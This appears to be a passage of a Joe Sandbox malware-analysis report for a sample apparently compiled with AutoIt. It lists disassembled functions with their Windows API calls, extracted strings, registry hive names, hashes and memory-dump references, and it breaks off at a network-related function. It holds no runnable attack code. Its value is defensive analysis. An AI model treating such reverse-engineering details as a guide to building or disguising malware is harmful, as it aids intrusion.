                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: _wcslen$MessageSend$BuffCharUpper
                                    • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                    • API String ID: 1103490817-4258414348
                                    • Opcode ID: 929c07897495c8cedb6c0f0205ef04eb9393bc82e6a41f5b7480a58fd6f111bb
                                    • Instruction ID: 8dd8ec93794cfae503df50f05c1a049290414dc80a365ecf531706b343699568
                                    • Opcode Fuzzy Hash: 929c07897495c8cedb6c0f0205ef04eb9393bc82e6a41f5b7480a58fd6f111bb
                                    • Instruction Fuzzy Hash: C0E17631208305DFCB14EF24C8509AAB7E9FF98318B148958F8969B2A2D774ED85CB91
                                    Function 0080C998 Relevance: 30.0, APIs: 7, Strings: 10, Instructions: 242COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: _wcslen$BuffCharUpper
                                    • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                    • API String ID: 1256254125-909552448
                                    • Opcode ID: e0552b291dab0751d220f9f9f9b5c05c978ba6a015589f28d706241fe8c6b8f9
                                    • Instruction ID: 7296fbd459ce62fbc94d2e4697e8db7ffaccb99d71fc61375559a8652ee53b14
                                    • Opcode Fuzzy Hash: e0552b291dab0751d220f9f9f9b5c05c978ba6a015589f28d706241fe8c6b8f9
                                    • Instruction Fuzzy Hash: C071EF7260016A8BCB60DFACCC516BB3395FBA1764B650728FC66E72C4E739DD4483A0
                                    Function 0081833C Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 196windowlibraryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • _wcslen.LIBCMT ref: 0081835A
                                    • _wcslen.LIBCMT ref: 0081836E
                                    • _wcslen.LIBCMT ref: 00818391
                                    • _wcslen.LIBCMT ref: 008183B4
                                    • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 008183F2
                                    • LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,00000001,?,?,?,0081361A,?), ref: 0081844E
                                    • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00818487
                                    • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 008184CA
                                    • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00818501
                                    • FreeLibrary.KERNEL32(?), ref: 0081850D
                                    • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0081851D
                                    • DestroyIcon.USER32(?), ref: 0081852C
                                    • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00818549
                                    • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00818555
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
                                    • String ID: .dll$.exe$.icl
                                    • API String ID: 799131459-1154884017
                                    • Opcode ID: 602d57034d4d289329289eacfbdeacf95f10555b8461fc9f3889fc2263ac968f
                                    • Instruction ID: 91ca45ce28b03f4ae9bebe65b61d876a5ed4dafce0c0a900eb49335c723ddcf0
                                    • Opcode Fuzzy Hash: 602d57034d4d289329289eacfbdeacf95f10555b8461fc9f3889fc2263ac968f
                                    • Instruction Fuzzy Hash: 3661AC71540219FAEB149B64CC46BFE77ACFF48B11F108609F815E61D1DBB9A990CBA0
                                    Function 00787778 Relevance: 28.3, APIs: 1, Strings: 15, Instructions: 273COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                    • API String ID: 0-1645009161
                                    • Opcode ID: 82674bbd53ffa74cd235bc9708ae0557cdd659503ade22fbe2510f88bb04280c
                                    • Instruction ID: 6622ff3fc9e1a7ce8cf3d5c4d515ffd1f9a0fc9d48bca4269e7a34191356c83a
                                    • Opcode Fuzzy Hash: 82674bbd53ffa74cd235bc9708ae0557cdd659503ade22fbe2510f88bb04280c
                                    • Instruction Fuzzy Hash: 8B814870688605FBDB24BF20CC4AFAE77A8FF55300F144028F916AA186EB7DD950C7A1
                                    Function 007F3E79 Relevance: 28.2, APIs: 8, Strings: 8, Instructions: 205COMMON
                                    Download Yara Rule
                                    APIs
                                    • CharLowerBuffW.USER32(?,?), ref: 007F3EF8
                                    • _wcslen.LIBCMT ref: 007F3F03
                                    • _wcslen.LIBCMT ref: 007F3F5A
                                    • _wcslen.LIBCMT ref: 007F3F98
                                    • GetDriveTypeW.KERNEL32(?), ref: 007F3FD6
                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 007F401E
                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 007F4059
                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 007F4087
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: SendString_wcslen$BuffCharDriveLowerType
                                    • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                    • API String ID: 1839972693-4113822522
                                    • Opcode ID: a2882c89835be990e85d6fbdd5789c7480bbf4e83967f3e41f286f67a25fd929
                                    • Instruction ID: cdff9df75690b6e2c37529f75ef8ef10c34708e4f302eab68fc28bce2d4fb85b
                                    • Opcode Fuzzy Hash: a2882c89835be990e85d6fbdd5789c7480bbf4e83967f3e41f286f67a25fd929
                                    • Instruction Fuzzy Hash: 9171AC7260420A9FC310EF24C88087AB7E4FF95768B10492DFA9597351EB39EE45CB52
                                    Function 007E5A1B Relevance: 27.2, APIs: 18, Instructions: 198windowtimeCOMMON
                                    Download Yara Rule
                                    APIs
                                    • LoadIconW.USER32(00000063), ref: 007E5A2E
                                    • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 007E5A40
                                    • SetWindowTextW.USER32(?,?), ref: 007E5A57
                                    • GetDlgItem.USER32(?,000003EA), ref: 007E5A6C
                                    • SetWindowTextW.USER32(00000000,?), ref: 007E5A72
                                    • GetDlgItem.USER32(?,000003E9), ref: 007E5A82
                                    • SetWindowTextW.USER32(00000000,?), ref: 007E5A88
                                    • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 007E5AA9
                                    • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 007E5AC3
                                    • GetWindowRect.USER32(?,?), ref: 007E5ACC
                                    • _wcslen.LIBCMT ref: 007E5B33
                                    • SetWindowTextW.USER32(?,?), ref: 007E5B6F
                                    • GetDesktopWindow.USER32 ref: 007E5B75
                                    • GetWindowRect.USER32(00000000), ref: 007E5B7C
                                    • MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 007E5BD3
                                    • GetClientRect.USER32(?,?), ref: 007E5BE0
                                    • PostMessageW.USER32(?,00000005,00000000,?), ref: 007E5C05
                                    • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 007E5C2F
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
                                    • String ID:
                                    • API String ID: 895679908-0
                                    • Opcode ID: 587880afd852675649b999b0b9b92d7000f7b1df0c9b37b6526deb17f3b72f8f
                                    • Instruction ID: caf2007947aa4fe7de7a3ef03f203e0f33b8af44af2a711be24f252b1529a245
                                    • Opcode Fuzzy Hash: 587880afd852675649b999b0b9b92d7000f7b1df0c9b37b6526deb17f3b72f8f
                                    • Instruction Fuzzy Hash: 5D718F71900B49EFDB20DFA9CE85AAEBBF5FF48708F10451CE142A25A0D779E940CB50
                                    Function 007A00C6 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 81COMMON
                                    Download Yara Rule
                                    APIs
                                    • __scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 007A00C6
                                      • Part of subcall function 007A00ED: InitializeCriticalSectionAndSpinCount.KERNEL32(0085070C,00000FA0,3FDB023C,?,?,?,?,007C23B3,000000FF), ref: 007A011C
                                      • Part of subcall function 007A00ED: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,007C23B3,000000FF), ref: 007A0127
                                      • Part of subcall function 007A00ED: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,007C23B3,000000FF), ref: 007A0138
                                      • Part of subcall function 007A00ED: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 007A014E
                                      • Part of subcall function 007A00ED: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 007A015C
                                      • Part of subcall function 007A00ED: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 007A016A
                                      • Part of subcall function 007A00ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 007A0195
                                      • Part of subcall function 007A00ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 007A01A0
                                    • ___scrt_fastfail.LIBCMT ref: 007A00E7
                                      • Part of subcall function 007A00A3: __onexit.LIBCMT ref: 007A00A9
                                    Strings
                                    • WakeAllConditionVariable, xrefs: 007A0162
                                    • SleepConditionVariableCS, xrefs: 007A0154
                                    • api-ms-win-core-synch-l1-2-0.dll, xrefs: 007A0122
                                    • kernel32.dll, xrefs: 007A0133
                                    • InitializeConditionVariable, xrefs: 007A0148
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
                                    • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                    • API String ID: 66158676-1714406822
                                    • Opcode ID: 2d34b94f7bf5b1dbeafea92f3eb294e99235bab475d6d07b9f5b89a1020dfc65
                                    • Instruction ID: 62138afd2d7d371bbffd48f3530fc5018fd1f81085ca177a4798a3534a8f9412
                                    • Opcode Fuzzy Hash: 2d34b94f7bf5b1dbeafea92f3eb294e99235bab475d6d07b9f5b89a1020dfc65
                                    • Instruction Fuzzy Hash: DF21D772685715ABDB105B64FC0ABEE37ECFF86B51F004629F911D2392DB6D98008AD0
                                    Function 007E30F7 Relevance: 24.9, APIs: 8, Strings: 6, Instructions: 400COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: _wcslen
                                    • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                    • API String ID: 176396367-1603158881
                                    • Opcode ID: 92c8de4526c174231a1f98b92e529592fd72fabd80d10375b7c0be328aef805a
                                    • Instruction ID: 66b3755c81b3f09aace032ffd4ede7331581d0728769358950d62f3fcc56d4ed
                                    • Opcode Fuzzy Hash: 92c8de4526c174231a1f98b92e529592fd72fabd80d10375b7c0be328aef805a
                                    • Instruction Fuzzy Hash: E3E13732A01596EBCB149FB9C449BFEF7B4FF48710F148229E556E7280DB38AE458790
                                    Function 007F44C0 Relevance: 24.8, APIs: 7, Strings: 7, Instructions: 309COMMON
                                    Download Yara Rule
                                    APIs
                                    • CharLowerBuffW.USER32(00000000,00000000,0081CC08), ref: 007F4527
                                    • _wcslen.LIBCMT ref: 007F453B
                                    • _wcslen.LIBCMT ref: 007F4599
                                    • _wcslen.LIBCMT ref: 007F45F4
                                    • _wcslen.LIBCMT ref: 007F463F
                                    • _wcslen.LIBCMT ref: 007F46A7
                                      • Part of subcall function 0079F9F2: _wcslen.LIBCMT ref: 0079F9FD
                                    • GetDriveTypeW.KERNEL32(?,00846BF0,00000061), ref: 007F4743
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: _wcslen$BuffCharDriveLowerType
                                    • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                    • API String ID: 2055661098-1000479233
                                    • Opcode ID: 344c1ad9b6cf745f0f286fe90fb5e924df0fb7ce149c53fd63359f3a051b9ea2
                                    • Instruction ID: da2385ba9f209c649f66589e93dcf2b53c428bfde949c19e20d5ef57308f48ba
                                    • Opcode Fuzzy Hash: 344c1ad9b6cf745f0f286fe90fb5e924df0fb7ce149c53fd63359f3a051b9ea2
                                    • Instruction Fuzzy Hash: B5B1BC316083069BC710EF28C894A7BB7E5BFA6760F50491DF696C7391E738D944CBA2
                                    Function 0080AFF9 Relevance: 24.4, APIs: 16, Instructions: 418processCOMMON
                                    Download Yara Rule
                                    APIs
                                    • _wcslen.LIBCMT ref: 0080B198
                                    • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0080B1B0
                                    • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0080B1D4
                                    • _wcslen.LIBCMT ref: 0080B200
                                    • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0080B214
                                    • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0080B236
                                    • _wcslen.LIBCMT ref: 0080B332
                                      • Part of subcall function 007F05A7: GetStdHandle.KERNEL32(000000F6), ref: 007F05C6
                                    • _wcslen.LIBCMT ref: 0080B34B
                                    • _wcslen.LIBCMT ref: 0080B366
                                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0080B3B6
                                    • GetLastError.KERNEL32(00000000), ref: 0080B407
                                    • CloseHandle.KERNEL32(?), ref: 0080B439
                                    • CloseHandle.KERNEL32(00000000), ref: 0080B44A
                                    • CloseHandle.KERNEL32(00000000), ref: 0080B45C
                                    • CloseHandle.KERNEL32(00000000), ref: 0080B46E
                                    • CloseHandle.KERNEL32(?), ref: 0080B4E3
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
                                    • String ID:
                                    • API String ID: 2178637699-0
                                    • Opcode ID: db9f9115cd8021919280d33a816bae0f761da98cfee3f13dfe5a4d4344de2b47
                                    • Instruction ID: 6634d74795643fafa30f3f177236d2efba315e08a1febd15a20cdf4d029eefdb
                                    • Opcode Fuzzy Hash: db9f9115cd8021919280d33a816bae0f761da98cfee3f13dfe5a4d4344de2b47
                                    • Instruction Fuzzy Hash: 9EF18931608240DFCB54EF24C885B6ABBE5FF85714F18855DF8999B2A2DB35EC40CB52
                                    Function 0078326F Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 214windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetMenuItemCount.USER32(00851990), ref: 007C2F8D
                                    • GetMenuItemCount.USER32(00851990), ref: 007C303D
                                    • GetCursorPos.USER32(?), ref: 007C3081
                                    • SetForegroundWindow.USER32(00000000), ref: 007C308A
                                    • TrackPopupMenuEx.USER32(00851990,00000000,?,00000000,00000000,00000000), ref: 007C309D
                                    • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 007C30A9
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
                                    • String ID: 0
                                    • API String ID: 36266755-4108050209
                                    • Opcode ID: b0b8fafed1a959a65dfee1021cfcfce8b756d44d07ae85f9e731cf1ca4ec17ad
                                    • Instruction ID: 107aa4a268e300e4b8d2b6c8dd36206aeee91678a17ae0b82d0bf4521e08d5ab
                                    • Opcode Fuzzy Hash: b0b8fafed1a959a65dfee1021cfcfce8b756d44d07ae85f9e731cf1ca4ec17ad
                                    • Instruction Fuzzy Hash: 12712B71684209BEEB219F28CC49FEABF69FF05724F20421EF514661E1C7B9AD50C790
                                    Function 00816CD9 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 194windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • DestroyWindow.USER32(?,?), ref: 00816DEB
                                      • Part of subcall function 00786B57: _wcslen.LIBCMT ref: 00786B6A
                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00816E5F
                                    • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00816E81
                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00816E94
                                    • DestroyWindow.USER32(?), ref: 00816EB5
                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00780000,00000000), ref: 00816EE4
                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00816EFD
                                    • GetDesktopWindow.USER32 ref: 00816F16
                                    • GetWindowRect.USER32(00000000), ref: 00816F1D
                                    • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00816F35
                                    • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00816F4D
                                      • Part of subcall function 00799944: GetWindowLongW.USER32(?,000000EB), ref: 00799952
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
                                    • String ID: 0$tooltips_class32
                                    • API String ID: 2429346358-3619404913
                                    • Opcode ID: 8436b2fa1197669d4e1ee4cc27ec4a76044981f475b3fe5fc7f55a0ea26e0f8f
                                    • Instruction ID: aa6bf2eb23b990edf7543a4290d1987bedb0797f316d93fc87f300d759a2393b
                                    • Opcode Fuzzy Hash: 8436b2fa1197669d4e1ee4cc27ec4a76044981f475b3fe5fc7f55a0ea26e0f8f
                                    • Instruction Fuzzy Hash: 917176B0244344AFDB21CF18D848BAABBE9FF88304F54491DF99AC7260DB74A956CB11
                                    Function 0081911E Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 181windowfileCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00799BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00799BB2
                                    • DragQueryPoint.SHELL32(?,?), ref: 00819147
                                      • Part of subcall function 00817674: ClientToScreen.USER32(?,?), ref: 0081769A
                                      • Part of subcall function 00817674: GetWindowRect.USER32(?,?), ref: 00817710
                                      • Part of subcall function 00817674: PtInRect.USER32(?,?,00818B89), ref: 00817720
                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 008191B0
                                    • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 008191BB
                                    • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 008191DE
                                    • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00819225
                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 0081923E
                                    • SendMessageW.USER32(?,000000B1,?,?), ref: 00819255
                                    • SendMessageW.USER32(?,000000B1,?,?), ref: 00819277
                                    • DragFinish.SHELL32(?), ref: 0081927E
                                    • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00819371
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
                                    • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                    • API String ID: 221274066-3440237614
                                    • Opcode ID: e207eb513192f2c01fccec1b632549765a5436ae848cd43ecac0795b3ccc368c
                                    • Instruction ID: faebc256d0931c87040be5618af5ae6d88cc4c1fe2a1ff423a4938a54d4327ba
                                    • Opcode Fuzzy Hash: e207eb513192f2c01fccec1b632549765a5436ae848cd43ecac0795b3ccc368c
                                    • Instruction Fuzzy Hash: 33617E71148301AFD701EF64DC89DAFBBE8FF88750F04091DF6A5922A1DB349A49CB52
                                    Function 007FC476 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 143networkCOMMON
                                    Download Yara Rule
                                    APIs
